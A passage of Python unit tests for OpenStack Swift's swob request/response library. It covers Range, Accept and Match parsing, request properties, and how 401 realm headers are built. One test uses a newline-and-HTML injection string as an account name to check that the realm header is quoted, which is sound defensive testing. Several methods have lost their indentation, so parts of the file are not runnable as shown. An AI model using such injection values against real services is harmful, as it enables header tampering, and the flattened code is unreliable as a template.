        rng = swift.common.swob.Range(at_the_limit_ranges)
        self.assertEquals(len(rng.ranges_for_length(1000000000)), 50)

        rng = swift.common.swob.Range(too_many_ranges)
        self.assertEquals(rng.ranges_for_length(1000000000), [])

    def test_range_invalid_syntax(self):

        def _check_invalid_range(range_value):
            try:
                swift.common.swob.Range(range_value)
                return False
            except ValueError:
                return True

        """
        All the following cases should result ValueError exception
        1. value not starts with bytes=
        2. range value start is greater than the end, eg. bytes=5-3
        3. range does not have start or end, eg. bytes=-
        4. range does not have hyphen, eg. bytes=45
        5. range value is non numeric
        6. any combination of the above
        """

        self.assert_(_check_invalid_range('nonbytes=foobar,10-2'))
        self.assert_(_check_invalid_range('bytes=5-3'))
        self.assert_(_check_invalid_range('bytes=-'))
        self.assert_(_check_invalid_range('bytes=45'))
        self.assert_(_check_invalid_range('bytes=foo-bar,3-5'))
        self.assert_(_check_invalid_range('bytes=4-10,45'))
        self.assert_(_check_invalid_range('bytes=foobar,3-5'))
        self.assert_(_check_invalid_range('bytes=nonumber-5'))
        self.assert_(_check_invalid_range('bytes=nonumber'))
class TestMatch(unittest.TestCase):
    """Tests for swob.Match (If-Match / If-None-Match etag parsing)."""

    def test_match(self):
        parsed = swift.common.swob.Match('"a", "b"')
        self.assertEquals(parsed.tags, set(('a', 'b')))
        for tag in ('a', 'b'):
            self.assert_(tag in parsed)
        self.assert_('c' not in parsed)

    def test_match_star(self):
        # A wildcard entry matches every tag.
        parsed = swift.common.swob.Match('"a", "*"')
        for tag in ('a', 'b', 'c'):
            self.assert_(tag in parsed)

    def test_match_noquote(self):
        # Unquoted etags are accepted as well.
        parsed = swift.common.swob.Match('a, b')
        self.assertEquals(parsed.tags, set(('a', 'b')))
        for tag in ('a', 'b'):
            self.assert_(tag in parsed)
        self.assert_('c' not in parsed)
class TestAccept(unittest.TestCase):
    """Tests for swob.Accept: content negotiation over the HTTP Accept
    header via best_match(), including quality (q=) parameters, wildcards
    and malformed header handling."""

    def test_accept_json(self):
        for accept in ('application/json', 'application/json;q=1.0,*/*;q=0.9',
                       '*/*;q=0.9,application/json;q=1.0', 'application/*',
                       'text/*,application/json', 'application/*,text/*',
                       'application/json,text/xml'):
            acc = swift.common.swob.Accept(accept)
            match = acc.best_match(['text/plain', 'application/json',
                                    'application/xml', 'text/xml'])
            self.assertEquals(match, 'application/json')

    def test_accept_plain(self):
        # An empty Accept header falls back to the server's first offer.
        for accept in ('', 'text/plain', 'application/xml;q=0.8,*/*;q=0.9',
                       '*/*;q=0.9,application/xml;q=0.8', '*/*',
                       'text/plain,application/xml'):
            acc = swift.common.swob.Accept(accept)
            match = acc.best_match(['text/plain', 'application/json',
                                    'application/xml', 'text/xml'])
            self.assertEquals(match, 'text/plain')

    def test_accept_xml(self):
        for accept in ('application/xml', 'application/xml;q=1.0,*/*;q=0.9',
                       '*/*;q=0.9,application/xml;q=1.0',
                       'application/xml;charset=UTF-8',
                       'application/xml;charset=UTF-8;qws="quoted with space"',
                       'application/xml; q=0.99 ; qws="quoted with space"'):
            acc = swift.common.swob.Accept(accept)
            match = acc.best_match(['text/plain', 'application/xml',
                                   'text/xml'])
            self.assertEquals(match, 'application/xml')

    def test_accept_invalid(self):
        # Malformed headers yield no match rather than raising.
        for accept in ('*', 'text/plain,,', 'some stuff',
                       'application/xml;q=1.0;q=1.1', 'text/plain,*',
                       'text /plain', 'text\x7f/plain',
                       'text/plain;a=b=c',
                       'text/plain;q=1;q=2',
                       'text/plain; ubq="unbalanced " quotes"'):
            acc = swift.common.swob.Accept(accept)
            match = acc.best_match(['text/plain', 'application/xml',
                                   'text/xml'])
            self.assertEquals(match, None)

    def test_repr(self):
        acc = swift.common.swob.Accept("application/json")
        self.assertEquals(repr(acc), "application/json")
class TestRequest(unittest.TestCase):
def test_blank(self):
req = swift.common.swob.Request.blank(
'/', environ={'REQUEST_METHOD': 'POST'},
headers={'Content-Type': 'text/plain'}, body='hi')
self.assertEquals(req.path_info, '/')
self.assertEquals(req.body, 'hi')
self.assertEquals(req.headers['Content-Type'], 'text/plain')
self.assertEquals(req.method, 'POST')
def test_blank_req_environ_property_args(self):
blank = swift.common.swob.Request.blank
req = blank('/', method='PATCH')
self.assertEquals(req.method, 'PATCH')
self.assertEquals(req.environ['REQUEST_METHOD'], 'PATCH')
req = blank('/', referer='http://example.com')
self.assertEquals(req.referer, 'http://example.com')
self.assertEquals(req.referrer, 'http://example.com')
self.assertEquals(req.environ['HTTP_REFERER'], 'http://example.com')
self.assertEquals(req.headers['Referer'], 'http://example.com')
req = blank('/', script_name='/application')
self.assertEquals(req.script_name, '/application')
self.assertEquals(req.environ['SCRIPT_NAME'], '/application')
req = blank('/', host='www.example.com')
self.assertEquals(req.host, 'www.example.com')
self.assertEquals(req.environ['HTTP_HOST'], 'www.example.com')
self.assertEquals(req.headers['Host'], 'www.example.com')
req = blank('/', remote_addr='127.0.0.1')
self.assertEquals(req.remote_addr, '127.0.0.1')
self.assertEquals(req.environ['REMOTE_ADDR'], '127.0.0.1')
req = blank('/', remote_user='username')
self.assertEquals(req.remote_user, 'username')
self.assertEquals(req.environ['REMOTE_USER'], 'username')
req = blank('/', user_agent='curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.user_agent, 'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.environ['HTTP_USER_AGENT'],
'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.headers['User-Agent'],
'curl/7.22.0 (x86_64-pc-linux-gnu)')
req = blank('/', query_string='a=b&c=d')
self.assertEquals(req.query_string, 'a=b&c=d')
self.assertEquals(req.environ['QUERY_STRING'], 'a=b&c=d')
req = blank('/', if_match='*')
self.assertEquals(req.environ['HTTP_IF_MATCH'], '*')
self.assertEquals(req.headers['If-Match'], '*')
# multiple environ property kwargs
req = blank('/', method='PATCH', referer='http://example.com',
script_name='/application', host='www.example.com',
remote_addr='127.0.0.1', remote_user='username',
user_agent='curl/7.22.0 (x86_64-pc-linux-gnu)',
query_string='a=b&c=d', if_match='*')
self.assertEquals(req.method, 'PATCH')
self.assertEquals(req.referer, 'http://example.com')
self.assertEquals(req.script_name, '/application')
self.assertEquals(req.host, 'www.example.com')
self.assertEquals(req.remote_addr, '127.0.0.1')
self.assertEquals(req.remote_user, 'username')
self.assertEquals(req.user_agent, 'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.query_string, 'a=b&c=d')
self.assertEquals(req.environ['QUERY_STRING'], 'a=b&c=d')
def test_invalid_req_environ_property_args(self):
# getter only property
try:
swift.common.swob.Request.blank('/', params={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword argument 'params'",
str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# regular attribute
try:
swift.common.swob.Request.blank('/', _params_cache={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument '_params_cache'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# non-existent attribute
try:
swift.common.swob.Request.blank('/', params_cache={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument 'params_cache'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# method
try:
swift.common.swob.Request.blank(
'/', as_referer='GET http://example.com')
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument 'as_referer'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
def test_blank_path_info_precedence(self):
blank = swift.common.swob.Request.blank
req = blank('/a')
self.assertEquals(req.path_info, '/a')
req = blank('/a', environ={'PATH_INFO': '/a/c'})
self.assertEquals(req.path_info, '/a/c')
req = blank('/a', environ={'PATH_INFO': '/a/c'}, path_info='/a/c/o')
self.assertEquals(req.path_info, '/a/c/o')
req = blank('/a', path_info='/a/c/o')
self.assertEquals(req.path_info, '/a/c/o')
    def test_blank_body_precedence(self):
        """The body kwarg overrides any wsgi.input in environ; body_file
        overrides body; an explicit content_length kwarg sets the header
        independently of the actual body length."""
        req = swift.common.swob.Request.blank(
            '/', environ={'REQUEST_METHOD': 'POST',
                          'wsgi.input': StringIO('')},
            headers={'Content-Type': 'text/plain'}, body='hi')
        self.assertEquals(req.path_info, '/')
        self.assertEquals(req.body, 'hi')
        self.assertEquals(req.headers['Content-Type'], 'text/plain')
        self.assertEquals(req.method, 'POST')
        body_file = StringIO('asdf')
        req = swift.common.swob.Request.blank(
            '/', environ={'REQUEST_METHOD': 'POST',
                          'wsgi.input': StringIO('')},
            headers={'Content-Type': 'text/plain'}, body='hi',
            body_file=body_file)
        self.assert_(req.body_file is body_file)
        req = swift.common.swob.Request.blank(
            '/', environ={'REQUEST_METHOD': 'POST',
                          'wsgi.input': StringIO('')},
            headers={'Content-Type': 'text/plain'}, body='hi',
            content_length=3)
        self.assertEquals(req.content_length, 3)
        # content_length kwarg wins for the header, but only the 2 bytes of
        # 'hi' are actually readable from the body
        self.assertEquals(len(req.body), 2)
    def test_blank_parsing(self):
        """blank() parses scheme/host/port from absolute URLs, treats
        scheme-less input as a bare path, and rejects unsupported schemes
        with TypeError."""
        req = swift.common.swob.Request.blank('http://test.com/')
        self.assertEquals(req.environ['wsgi.url_scheme'], 'http')
        self.assertEquals(req.environ['SERVER_PORT'], '80')
        self.assertEquals(req.environ['SERVER_NAME'], 'test.com')
        req = swift.common.swob.Request.blank('https://test.com:456/')
        self.assertEquals(req.environ['wsgi.url_scheme'], 'https')
        self.assertEquals(req.environ['SERVER_PORT'], '456')
        req = swift.common.swob.Request.blank('test.com/')
        self.assertEquals(req.environ['wsgi.url_scheme'], 'http')
        self.assertEquals(req.environ['SERVER_PORT'], '80')
        # no scheme: the whole string becomes PATH_INFO
        self.assertEquals(req.environ['PATH_INFO'], 'test.com/')
        self.assertRaises(TypeError, swift.common.swob.Request.blank,
                          'ftp://test.com/')
def test_params(self):
req = swift.common.swob.Request.blank('/?a=b&c=d')
self.assertEquals(req.params['a'], 'b')
self.assertEquals(req.params['c'], 'd')
    def test_timestamp_missing(self):
        """Reading req.timestamp without an X-Timestamp header raises
        InvalidTimestamp."""
        req = swift.common.swob.Request.blank('/')
        self.assertRaises(exceptions.InvalidTimestamp,
                          getattr, req, 'timestamp')
    def test_timestamp_invalid(self):
        """An unparseable X-Timestamp header raises InvalidTimestamp on
        access."""
        req = swift.common.swob.Request.blank(
            '/', headers={'X-Timestamp': 'asdf'})
        self.assertRaises(exceptions.InvalidTimestamp,
                          getattr, req, 'timestamp')
    def test_timestamp(self):
        """X-Timestamp is parsed into a utils.Timestamp, preserving the
        offset suffix and both normal and internal representations."""
        req = swift.common.swob.Request.blank(
            '/', headers={'X-Timestamp': '1402447134.13507_00000001'})
        expected = utils.Timestamp('1402447134.13507', offset=1)
        self.assertEqual(req.timestamp, expected)
        self.assertEqual(req.timestamp.normal, expected.normal)
        self.assertEqual(req.timestamp.internal, expected.internal)
def test_path(self):
req = swift.common.swob.Request.blank('/hi?a=b&c=d')
self.assertEquals(req.path, '/hi')
req = swift.common.swob.Request.blank(
'/', environ={'SCRIPT_NAME': '/hi', 'PATH_INFO': '/there'})
self.assertEquals(req.path, '/hi/there')
    def test_path_question_mark(self):
        """A percent-encoded '?' round-trips: unquoted into PATH_INFO,
        re-quoted by the path property."""
        req = swift.common.swob.Request.blank('/test%3Ffile')
        # This tests that .blank unquotes the path when setting PATH_INFO
        self.assertEquals(req.environ['PATH_INFO'], '/test?file')
        # This tests that .path requotes it
        self.assertEquals(req.path, '/test%3Ffile')
    def test_path_info_pop(self):
        """path_info_pop shifts the first segment of PATH_INFO onto
        SCRIPT_NAME and returns it."""
        req = swift.common.swob.Request.blank('/hi/there')
        self.assertEquals(req.path_info_pop(), 'hi')
        self.assertEquals(req.path_info, '/there')
        self.assertEquals(req.script_name, '/hi')
def test_bad_path_info_pop(self):
req = swift.common.swob.Request.blank('blahblah')
self.assertEquals(req.path_info_pop(), None)
    def test_path_info_pop_last(self):
        """Popping the only segment leaves PATH_INFO empty and moves the
        segment to SCRIPT_NAME."""
        req = swift.common.swob.Request.blank('/last')
        self.assertEquals(req.path_info_pop(), 'last')
        self.assertEquals(req.path_info, '')
        self.assertEquals(req.script_name, '/last')
    def test_path_info_pop_none(self):
        """Popping the bare root path returns '' and leaves SCRIPT_NAME at
        '/'."""
        req = swift.common.swob.Request.blank('/')
        self.assertEquals(req.path_info_pop(), '')
        self.assertEquals(req.path_info, '')
        self.assertEquals(req.script_name, '/')
def test_copy_get(self):
req = swift.common.swob.Request.blank(
'/hi/there', environ={'REQUEST_METHOD': 'POST'})
self.assertEquals(req.method, 'POST')
req2 = req.copy_get()
self.assertEquals(req2.method, 'GET')
    def test_get_response(self):
        """get_response runs the request through a WSGI app and wraps the
        result in a swob Response."""
        def test_app(environ, start_response):
            start_response('200 OK', [])
            return ['hi']
        req = swift.common.swob.Request.blank('/')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 200)
        self.assertEquals(resp.body, 'hi')
    def test_401_unauthorized(self):
        """401 responses carry a Www-Authenticate header whether or not a
        request environment is attached."""
        # No request environment
        resp = swift.common.swob.HTTPUnauthorized()
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        # Request environment
        req = swift.common.swob.Request.blank('/')
        resp = swift.common.swob.HTTPUnauthorized(request=req)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
    def test_401_valid_account_path(self):
        """For /v1/<account>[/...] paths, the 401 Www-Authenticate realm is
        derived from the account name."""
        def test_app(environ, start_response):
            start_response('401 Unauthorized', [])
            return ['hi']
        # Request environment contains valid account in path
        req = swift.common.swob.Request.blank('/v1/account-name')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="account-name"',
                          resp.headers['Www-Authenticate'])
        # Request environment contains valid account/container in path
        req = swift.common.swob.Request.blank('/v1/account-name/c')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="account-name"',
                          resp.headers['Www-Authenticate'])
    def test_401_invalid_path(self):
        """Paths that don't match /v1/<account> get realm 'unknown' in the
        401 Www-Authenticate header."""
        def test_app(environ, start_response):
            start_response('401 Unauthorized', [])
            return ['hi']
        # Request environment contains bad path
        req = swift.common.swob.Request.blank('/random')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="unknown"',
                          resp.headers['Www-Authenticate'])
    def test_401_non_keystone_auth_path(self):
        """Auth-endpoint paths (/v1.0/auth, /auth/v1.0) are not account
        paths, so the 401 realm falls back to 'unknown'."""
        def test_app(environ, start_response):
            start_response('401 Unauthorized', [])
            return ['no creds in request']
        # Request to get token
        req = swift.common.swob.Request.blank('/v1.0/auth')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="unknown"',
                          resp.headers['Www-Authenticate'])
        # Other form of path
        req = swift.common.swob.Request.blank('/auth/v1.0')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="unknown"',
                          resp.headers['Www-Authenticate'])
    def test_401_www_authenticate_exists(self):
        """A Www-Authenticate header set by the app (auth middleware) is
        preserved rather than overwritten with a Swift realm."""
        def test_app(environ, start_response):
            # NOTE(review): headers passed as a dict rather than the WSGI
            # list-of-tuples; swob's response plumbing appears to accept
            # either here -- confirm before reusing this pattern
            start_response('401 Unauthorized', {
                'Www-Authenticate': 'Me realm="whatever"'})
            return ['no creds in request']
        # Auth middleware sets own Www-Authenticate
        req = swift.common.swob.Request.blank('/auth/v1.0')
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Me realm="whatever"',
                          resp.headers['Www-Authenticate'])
    def test_401_www_authenticate_is_quoted(self):
        """Account names are URL-quoted when building the 401 realm, so
        markup/newlines in the path cannot be injected into the header."""
        def test_app(environ, start_response):
            start_response('401 Unauthorized', [])
            return ['hi']
        hacker = 'account-name\n\n<b>foo<br>'  # url injection test
        quoted_hacker = quote(hacker)
        req = swift.common.swob.Request.blank('/v1/' + hacker)
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="%s"' % quoted_hacker,
                          resp.headers['Www-Authenticate'])
        # an already-quoted account name is not double-quoted
        req = swift.common.swob.Request.blank('/v1/' + quoted_hacker)
        resp = req.get_response(test_app)
        self.assertEquals(resp.status_int, 401)
        self.assert_('Www-Authenticate' in resp.headers)
        self.assertEquals('Swift realm="%s"' % quoted_hacker,
                          resp.headers['Www-Authenticate'])
    def test_not_401(self):
        # Other status codes should not have WWW-Authenticate in response
        def test_app(environ, start_response):
            start_response('200 OK', [])
            return ['hi']
        req = swift.common.swob.Request.blank('/')
        resp = req.get_response(test_app)
        self.assert_('Www-Authenticate' not in resp.headers)
    def test_properties(self):
        """Request property setters (remote_addr, body, range) mirror into
        the environ/headers; setting range to None removes the header."""
        req = swift.common.swob.Request.blank('/hi/there', body='hi')
        self.assertEquals(req.body, 'hi')
        self.assertEquals(req.content_length, 2)
        req.remote_addr = 'something'
        self.assertEquals(req.environ['REMOTE_ADDR'], 'something')
        req.body = 'whatever'
        # assigning body also updates content_length
        self.assertEquals(req.content_length, 8)
        self.assertEquals(req.body, 'whatever')
        self.assertEquals(req.method, 'GET')
        req.range = 'bytes=1-7'
        self.assertEquals(req.range.ranges[0], (1, 7))
        self.assert_('Range' in req.headers)
        req.range = None
        self.assert_('Range' not in req.headers)
    def test_datetime_properties(self):
        """if_unmodified_since accepts epoch ints and datetimes, yields None
        for unparseable or out-of-range header values, and is removed when
        set to None."""
        req = swift.common.swob.Request.blank('/hi/there', body='hi')
        req.if_unmodified_since = 0
        self.assert_(isinstance(req.if_unmodified_since, datetime.datetime))
        if_unmodified_since = req.if_unmodified_since
        req.if_unmodified_since = if_unmodified_since
        self.assertEquals(if_unmodified_since, req.if_unmodified_since)
        # an unparseable header stays in place but reads back as None
        req.if_unmodified_since = 'something'
        self.assertEquals(req.headers['If-Unmodified-Since'], 'something')
        self.assertEquals(req.if_unmodified_since, None)
        self.assert_('If-Unmodified-Since' in req.headers)
        req.if_unmodified_since = None
        self.assert_('If-Unmodified-Since' not in req.headers)
        too_big_date_list = list(datetime.datetime.max.timetuple())
        too_big_date_list[0] += 1  # bump up the year
        too_big_date = time.strftime(
            "%a, %d %b %Y %H:%M:%S UTC", time.struct_time(too_big_date_list))
        # dates beyond datetime.max also read back as None
        req.if_unmodified_since = too_big_date
        self.assertEqual(req.if_unmodified_since, None)
    def test_bad_range(self):
        """An unparseable Range header reads back as None."""
        req = swift.common.swob.Request.blank('/hi/there', body='hi')
        req.range = 'bad range'
        self.assertEquals(req.range, None)
    def test_accept_header(self):
        """accept.best_match honors the client's Accept header regardless of
        the order of the server-offered types."""
        req = swift.common.swob.Request({'REQUEST_METHOD': 'GET',
                                         'PATH_INFO': '/',
                                         'HTTP_ACCEPT': 'application/json'})
        self.assertEqual(
            req.accept.best_match(['application/json', 'text/plain']),
            'application/json')
        self.assertEqual(
            req.accept.best_match(['text/plain', 'application/json']),
            'application/json')
    def test_swift_entity_path(self):
        """swift_entity_path strips the /v1 version prefix, or is None when
        only the version is present."""
        req = swift.common.swob.Request.blank('/v1/a/c/o')
        self.assertEqual(req.swift_entity_path, '/a/c/o')
        req = swift.common.swob.Request.blank('/v1/a/c')
        self.assertEqual(req.swift_entity_path, '/a/c')
        req = swift.common.swob.Request.blank('/v1/a')
        self.assertEqual(req.swift_entity_path, '/a')
        req = swift.common.swob.Request.blank('/v1')
        self.assertEqual(req.swift_entity_path, None)
    def test_path_qs(self):
        """path_qs is the path plus '?' and the raw query string, whether
        built via blank() or a bare environ."""
        req = swift.common.swob.Request.blank('/hi/there?hello=equal&acl')
        self.assertEqual(req.path_qs, '/hi/there?hello=equal&acl')
        req = swift.common.swob.Request({'PATH_INFO': '/hi/there',
                                         'QUERY_STRING': 'hello=equal&acl'})
        self.assertEqual(req.path_qs, '/hi/there?hello=equal&acl')
def test_url(self):
req = swift.common.swob.Request.blank('/hi/there?hello=equal&acl')
self.assertEqual(req.url,
'http://localhost/hi/there?hello=equal&acl')
    def test_wsgify(self):
        """@wsgify turns a Request->Response function into a WSGI app."""
        used_req = []

        @swift.common.swob.wsgify
        def _wsgi_func(req):
            used_req.append(req)
            return swift.common.swob.Response('200 OK')
        req = swift.common.swob.Request.blank('/hi/there')
        resp = req.get_response(_wsgi_func)
        self.assertEqual(used_req[0].path, '/hi/there')
        self.assertEqual(resp.status_int, 200)
    def test_wsgify_raise(self):
        """@wsgify converts raised HTTP exceptions into responses."""
        used_req = []

        @swift.common.swob.wsgify
        def _wsgi_func(req):
            used_req.append(req)
            raise swift.common.swob.HTTPServerError()
        req = swift.common.swob.Request.blank('/hi/there')
        resp = req.get_response(_wsgi_func)
        self.assertEqual(used_req[0].path, '/hi/there')
        self.assertEqual(resp.status_int, 500)
    def test_split_path(self):
        """
        Exercise Request.split_path (minsegs/maxsegs/rest_with_last);
        cases copied from swift.common.utils.split_path.
        """
        def _test_split_path(path, minsegs=1, maxsegs=None, rwl=False):
            req = swift.common.swob.Request.blank(path)
            return req.split_path(minsegs, maxsegs, rwl)
        self.assertRaises(ValueError, _test_split_path, '')
        self.assertRaises(ValueError, _test_split_path, '/')
        self.assertRaises(ValueError, _test_split_path, '//')
        self.assertEquals(_test_split_path('/a'), ['a'])
        self.assertRaises(ValueError, _test_split_path, '//a')
        self.assertEquals(_test_split_path('/a/'), ['a'])
        self.assertRaises(ValueError, _test_split_path, '/a/c')
        self.assertRaises(ValueError, _test_split_path, '//c')
        self.assertRaises(ValueError, _test_split_path, '/a/c/')
        self.assertRaises(ValueError, _test_split_path, '/a//')
        self.assertRaises(ValueError, _test_split_path, '/a', 2)
        self.assertRaises(ValueError, _test_split_path, '/a', 2, 3)
        self.assertRaises(ValueError, _test_split_path, '/a', 2, 3, True)
        self.assertEquals(_test_split_path('/a/c', 2), ['a', 'c'])
        self.assertEquals(_test_split_path('/a/c/o', 3), ['a', 'c', 'o'])
        self.assertRaises(ValueError, _test_split_path, '/a/c/o/r', 3, 3)
        self.assertEquals(_test_split_path('/a/c/o/r', 3, 3, True),
                          ['a', 'c', 'o/r'])
        self.assertEquals(_test_split_path('/a/c', 2, 3, True),
                          ['a', 'c', None])
        self.assertRaises(ValueError, _test_split_path, '/a', 5, 4)
        self.assertEquals(_test_split_path('/a/c/', 2), ['a', 'c'])
        self.assertEquals(_test_split_path('/a/c/', 2, 3), ['a', 'c', ''])
        # invalid characters are quoted in the error message
        try:
            _test_split_path('o\nn e', 2)
        except ValueError as err:
            self.assertEquals(str(err), 'Invalid path: o%0An%20e')
        try:
            _test_split_path('o\nn e', 2, 3, True)
        except ValueError as err:
            self.assertEquals(str(err), 'Invalid path: o%0An%20e')
    def test_unicode_path(self):
        """Unicode paths are UTF-8 encoded then percent-quoted by .path."""
        req = swift.common.swob.Request.blank(u'/\u2661')
        self.assertEquals(req.path, quote(u'/\u2661'.encode('utf-8')))
    def test_unicode_query(self):
        """Unicode query values come back UTF-8 encoded from params."""
        req = swift.common.swob.Request.blank(u'/')
        req.query_string = u'x=\u2661'
        self.assertEquals(req.params['x'], u'\u2661'.encode('utf-8'))
    def test_url2(self):
        """url construction from environ: HTTP_HOST overrides
        SERVER_NAME/SERVER_PORT, and default ports (80 for http, 443 for
        https) are omitted from the result."""
        pi = '/hi/there'
        path = pi
        req = swift.common.swob.Request.blank(path)
        sche = 'http'
        exp_url = '%s://localhost%s' % (sche, pi)
        self.assertEqual(req.url, exp_url)
        qs = 'hello=equal&acl'
        path = '%s?%s' % (pi, qs)
        # explicit SERVER_NAME/SERVER_PORT, non-default port kept
        s, p = 'unit.test.example.com', '90'
        req = swift.common.swob.Request({'PATH_INFO': pi,
                                         'QUERY_STRING': qs,
                                         'SERVER_NAME': s,
                                         'SERVER_PORT': p})
        exp_url = '%s://%s:%s%s?%s' % (sche, s, p, pi, qs)
        self.assertEqual(req.url, exp_url)
        # HTTP_HOST with default http port: port squelched
        host = 'unit.test.example.com'
        req = swift.common.swob.Request({'PATH_INFO': pi,
                                         'QUERY_STRING': qs,
                                         'HTTP_HOST': host + ':80'})
        exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
        self.assertEqual(req.url, exp_url)
        # HTTP_HOST with default https port: port squelched
        host = 'unit.test.example.com'
        sche = 'https'
        req = swift.common.swob.Request({'PATH_INFO': pi,
                                         'QUERY_STRING': qs,
                                         'HTTP_HOST': host + ':443',
                                         'wsgi.url_scheme': sche})
        exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
        self.assertEqual(req.url, exp_url)
        # non-default port in HTTP_HOST is preserved
        host = 'unit.test.example.com:81'
        req = swift.common.swob.Request({'PATH_INFO': pi,
                                         'QUERY_STRING': qs,
                                         'HTTP_HOST': host,
                                         'wsgi.url_scheme': sche})
        exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
        self.assertEqual(req.url, exp_url)
    def test_as_referer(self):
        """as_referer() is '<METHOD> <full url>'."""
        pi = '/hi/there'
        qs = 'hello=equal&acl'
        sche = 'https'
        host = 'unit.test.example.com:81'
        req = swift.common.swob.Request({'REQUEST_METHOD': 'POST',
                                         'PATH_INFO': pi,
                                         'QUERY_STRING': qs,
                                         'HTTP_HOST': host,
                                         'wsgi.url_scheme': sche})
        exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
        self.assertEqual(req.as_referer(), 'POST ' + exp_url)
    def test_message_length_just_content_length(self):
        """message_length() is None without a Content-Length, the length of
        the body when set, and raises ValueError for a non-numeric header."""
        req = swift.common.swob.Request.blank(
            u'/',
            environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'})
        self.assertEquals(req.message_length(), None)
        req = swift.common.swob.Request.blank(
            u'/',
            environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'},
            body='x' * 42)
        self.assertEquals(req.message_length(), 42)
        req.headers['Content-Length'] = 'abc'
        try:
            req.message_length()
        except ValueError as e:
            self.assertEquals(str(e), "Invalid Content-Length header value")
        else:
            self.fail("Expected a ValueError raised for 'abc'")
    def test_message_length_transfer_encoding(self):
        """With Transfer-Encoding: chunked message_length() is None; any
        other coding raises (AttributeError if chunked is present with it,
        ValueError if chunked is absent)."""
        req = swift.common.swob.Request.blank(
            u'/',
            environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'},
            headers={'transfer-encoding': 'chunked'},
            body='x' * 42)
        self.assertEquals(req.message_length(), None)
        req.headers['Transfer-Encoding'] = 'gzip,chunked'
        try:
            req.message_length()
        except AttributeError as e:
            self.assertEquals(str(e), "Unsupported Transfer-Coding header"
                              " value specified in Transfer-Encoding header")
        else:
            self.fail("Expected an AttributeError raised for 'gzip'")
        req.headers['Transfer-Encoding'] = 'gzip'
        try:
            req.message_length()
        except ValueError as e:
            self.assertEquals(str(e), "Invalid Transfer-Encoding header value")
        else:
            self.fail("Expected a ValueError raised for 'gzip'")
        req.headers['Transfer-Encoding'] = 'gzip,identity'
        try:
            req.message_length()
        except AttributeError as e:
            self.assertEquals(str(e), "Unsupported Transfer-Coding header"
                              " value specified in Transfer-Encoding header")
        else:
            self.fail("Expected an AttributeError raised for 'gzip,identity'")
class TestStatusMap(unittest.TestCase):
    """Tests for swob's status_map of HTTP exception classes."""

    def test_status_map(self):
        """status_map[404] builds a well-formed Not Found response."""
        captured = []

        def start_response(status, headers):
            captured.append(status)
            captured.append(headers)

        resp_cls = swift.common.swob.status_map[404]
        resp = resp_cls()
        self.assertEquals(404, resp.status_int)
        self.assertEquals('Not Found', resp.title)
        body = ''.join(resp({}, start_response))
        self.assert_('The resource could not be found.' in body)
        self.assertEquals('404 Not Found', captured[0])
        headers = dict(captured[1])
        self.assertEquals('text/html; charset=UTF-8', headers['Content-Type'])
        self.assert_(int(headers['Content-Length']) > 0)
class TestResponse(unittest.TestCase):
    """Tests for swift.common.swob.Response: header properties, conditional
    and range responses, Location rewriting, and body/app_iter handling."""

    def _get_response(self):
        """Return a 200 'hi' response generated by a trivial WSGI app."""
        def test_app(environ, start_response):
            start_response('200 OK', [])
            return ['hi']
        req = swift.common.swob.Request.blank('/')
        return req.get_response(test_app)

    def test_properties(self):
        """location/content_type setters mirror into headers; setting None
        removes the header."""
        resp = self._get_response()
        resp.location = 'something'
        self.assertEquals(resp.location, 'something')
        self.assert_('Location' in resp.headers)
        resp.location = None
        self.assert_('Location' not in resp.headers)
        resp.content_type = 'text/plain'
        self.assert_('Content-Type' in resp.headers)
        resp.content_type = None
        self.assert_('Content-Type' not in resp.headers)

    def test_empty_body(self):
        """An empty string body round-trips."""
        resp = self._get_response()
        resp.body = ''
        self.assertEquals(resp.body, '')

    def test_unicode_body(self):
        """Unicode bodies are stored UTF-8 encoded."""
        resp = self._get_response()
        resp.body = u'\N{SNOWMAN}'
        self.assertEquals(resp.body, u'\N{SNOWMAN}'.encode('utf-8'))

    def test_call_reifies_request_if_necessary(self):
        """
        The actual bug was a HEAD response coming out with a body because the
        Request object wasn't passed into the Response object's constructor.
        The Response object's __call__ method should be able to reify a
        Request object from the env it gets passed.
        """
        def test_app(environ, start_response):
            start_response('200 OK', [])
            return ['hi']
        req = swift.common.swob.Request.blank('/')
        req.method = 'HEAD'
